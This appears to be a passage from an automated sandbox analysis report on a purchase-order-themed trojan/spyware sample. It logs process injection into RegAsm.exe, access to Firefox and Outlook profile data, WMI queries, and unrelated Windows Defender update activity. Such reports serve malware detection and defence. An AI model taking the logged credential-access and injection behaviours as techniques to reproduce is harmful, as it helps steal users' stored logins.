          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF6578FB0C8
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF657967108
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65796D058
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65797B058
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF657957050
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65790EFCC
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65792502C
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65796C034
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF657975F9C
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65791FFA8
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65790DFB4
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF657901FA8
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF657955ED0
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65796BE48
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF657952DD4
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF657971E00
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65796DD9C
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF657951D78
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF657923CE0
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65796CCC8
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF6578F9CFC
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF657911D00
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65796BC60
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF657913C87
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF657921C10
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF657969B34
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65791AA68
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65796BA74
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF657920AB0
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65796D9D0
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF6578FB944
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF657971950
          Source: LISTA DE PEDIDO DE COMPRA.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exeSection loaded: edgegdi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edgegdi.dll
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeSection loaded: edgegdi.dll
          Source: LISTA DE PEDIDO DE COMPRA.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exeFile deleted: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeJump to behavior
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exeFile created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9Jump to behavior
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: String function: 00007FF657900DB4 appears 56 times
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: String function: 00007FF657900D88 appears 41 times
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: String function: 00007FF65795BAAC appears 36 times
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65790C444 NtQueryInformationProcess,NtQueryInformationProcess,FindCloseChangeNotification,CloseHandle,
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF657909FF0 NtSetInformationFile,
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF657915DB4 NtQueryInformationFile,NtQueryInformationFile,RtlNtStatusToDosError,
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF657915B80 ReadFile,FlushFileBuffers,SetEndOfFile,NtSetInformationFile,
          Source: mpasdlta.vdm.25.drStatic PE information: No import functions for PE file found
          Source: mpavdlta.vdm.25.drStatic PE information: No import functions for PE file found
          Source: LISTA DE PEDIDO DE COMPRA.exe, 00000001.00000002.3240243274.0000000000415000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameUnseaming.exe vs LISTA DE PEDIDO DE COMPRA.exe
          Source: LISTA DE PEDIDO DE COMPRA.exeBinary or memory string: OriginalFilenameUnseaming.exe vs LISTA DE PEDIDO DE COMPRA.exe
          Source: C:\Windows\System32\wevtutil.exeProcess token adjusted: Security
          Source: LISTA DE PEDIDO DE COMPRA.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
          Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@13/5@3/3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF6578FB0C8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF657911AE0 FindResourceW,GetLastError,LoadResource,GetLastError,LockResource,GetLastError,SizeofResource,GetLastError,
          Source: LISTA DE PEDIDO DE COMPRA.exe, 00000001.00000002.3240216938.0000000000414000.00000004.00020000.sdmpBinary or memory string: n.s$n.s,n.s4n.s<n.sDn.sLn.sTn.s\n.sdn.sln.stn.s|n.s
          Source: LISTA DE PEDIDO DE COMPRA.exeReversingLabs: Detection: 15%
          Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe 'C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe'
          Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe'
          Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe'
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exe 'C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-1ba0cab.exe' /q WD
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exeProcess created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe /stub 1.1.18500.10 /payload 1.349.1503.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-1ba0cab.exe /q WD
          Source: unknownProcess created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe uninstall-manifest C:\Windows\TEMP\6E33F3E4-DD3F-9BF4-EC8E-12828A11375C.man
          Source: C:\Windows\System32\wevtutil.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\6E33F3E4-DD3F-9BF4-EC8E-12828A11375C.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll'
          Source: C:\Windows\System32\wevtutil.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe'
          Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe'
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exeProcess created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe /stub 1.1.18500.10 /payload 1.349.1503.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-1ba0cab.exe /q WD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65795F118 LookupPrivilegeValueW,GetCurrentProcess,CloseHandle,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exeFile created: C:\Users\user\AppData\Local\Temp\~DF99B78B61EDC895B1.TMPJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65790B1C4 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,GetLastError,Process32FirstW,GetLastError,Process32NextW,GetLastError,FindCloseChangeNotification,CloseHandle,
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5540:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5540:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3480:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3480:120:WilError_03
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: Binary string: MpSigStub.pdbGCTL source: mpam-1ba0cab.exe, 00000019.00000003.6149251039.0000020B4D841000.00000004.00000001.sdmp, MpSigStub.exe, 0000001A.00000002.6241664412.00007FF657987000.00000002.00020000.sdmp, MpSigStub.exe.25.dr
          Source: Binary string: MpAdlStub.pdbGCTL source: mpam-1ba0cab.exe, 00000019.00000002.6244546959.00007FF7E3A9F000.00000002.00020000.sdmp
          Source: Binary string: MpAdlStub.pdb source: mpam-1ba0cab.exe, 00000019.00000002.6244546959.00007FF7E3A9F000.00000002.00020000.sdmp
          Source: Binary string: MpSigStub.pdb source: mpam-1ba0cab.exe, 00000019.00000003.6149251039.0000020B4D841000.00000004.00000001.sdmp, MpSigStub.exe, 0000001A.00000002.6241664412.00007FF657987000.00000002.00020000.sdmp, MpSigStub.exe.25.dr
          Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exeCode function: 1_2_0040747B pushfd ; ret
          Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exeCode function: 1_2_0040401B push ds; ret
          Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exeCode function: 1_2_00406946 push ebx; ret
          Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exeCode function: 1_2_004085A7 push edx; ret
          Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exeCode function: 1_2_02273A1F push esi; iretd
          Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exeCode function: 1_2_0227106C pushfd ; retf
          Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exeCode function: 1_2_02270EAE push edx; retf
          Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exeCode function: 1_2_02272CC4 push ds; ret
          Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exeCode function: 1_2_02272F47 push esp; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_00A3C43D push FFFFFFB9h; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_00A3C41E push FFFFFFB9h; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_1C9824E8 pushfd ; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_1FEAF8B8 pushad ; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_1FEA7088 push esp; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_1FEA708C pushfd ; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_1FEA703C pushad ; iretd
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exeFile created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\mpasdlta.vdmJump to dropped file
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exeFile created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\mpavdlta.vdmJump to dropped file
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exeFile created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\mpasdlta.vdmJump to dropped file
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exeFile created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\mpavdlta.vdmJump to dropped file
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exeFile created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeJump to dropped file
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exeFile created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\mpasdlta.vdmJump to dropped file
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exeFile created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\mpavdlta.vdmJump to dropped file
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-1ba0cab.exeFile created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeJump to dropped file
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF6578FB0C8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender
          Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
